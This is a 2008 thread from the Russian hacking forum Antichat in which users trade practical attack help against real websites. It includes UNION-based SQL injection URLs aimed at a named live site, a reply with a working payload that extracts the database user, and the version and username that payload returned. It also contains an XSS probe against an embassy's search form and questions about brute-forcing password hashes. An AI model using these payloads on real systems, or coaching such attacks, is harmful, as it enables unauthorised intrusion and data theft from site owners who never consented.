ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.04.2008, 01:40
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
SELECT table_schema FROM information_schema.tables WHERE table_name='imyatablici'
|
|
|
04.04.2008, 12:39
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+null,null,null,null,null,null,null,null,null,null,null/*
такя проблема есть скуль возникла такая проблема с выводом заначений когда вставляю подставляю int значения
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11/*
все норм но если подставляю Что нить типа user или from table возникает ошибка в чем проблема  |
|
|
|
04.04.2008, 12:56
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Пробуй так
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6,7,8,9,10,11/*
вер. 4.1.7-nt-max
юзер. wfsj@localhost
Прочитать можно тут
http://forum.antichat.ru/showthread.php?t=19605
Да и еще, убери пробелы которые добавил форум.
Удачи.
Последний раз редактировалось Red_Red1; 04.04.2008 в 13:01..
|
|
|
|
04.04.2008, 13:12
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
спс
|
|
|
|
04.04.2008, 17:57
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
вобщем тема такая- защел я на наше посольство зарубежом(по понятным причинам умолчу в которое) и в поиске ввел "><script>alert()</script>
на что мне выдало
вот и возникает у меня вопросс- действительно это скуль? и насколько это опасно в плане IT безопасности (за Родину обидно млин) , мож предупредить их ? |
|
|
|
04.04.2008, 19:10
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
я таки думаю что кроме раскрытия путей больше не как и не используешь по крайней мере по скрину
ну это раскрытие может быть полезно если будет скуль с filepriv
Последний раз редактировалось MaSter GeN; 04.04.2008 в 19:14..
|
|
|
|
04.04.2008, 19:13
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
типичная ошибка servlet'a имхо...
|
|
|
|
04.04.2008, 19:14
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
zapadlo17
Помоему ошибка при проверке ввода, просто некоректные данные
Всмысле, возможность инжекта из этого не вытекает
Последний раз редактировалось jokester; 04.04.2008 в 19:19..
Причина: дополнение
|
|
|
|
04.04.2008, 20:51
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Ошибка говорит о том, что на MSSQL сервере (скорее всего) отключена поодержка full text search, не знаю почему возникает такая ошибка, но скорее всего из-за того, что в запросе встречаются спецсимволы, которые в полнотекстовом поиске используются в качестве шаблонов
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.04.2008, 00:21
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Я не наю, куда ещё писать, но раз это вопросы,то вот пара нупских вопросов :
1. Надо ли указывать настоящий логин для перебора хеша?))
2. Если да, то как в таком случае используется логин(или имя,как хотите : ) ) для перебора ?)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
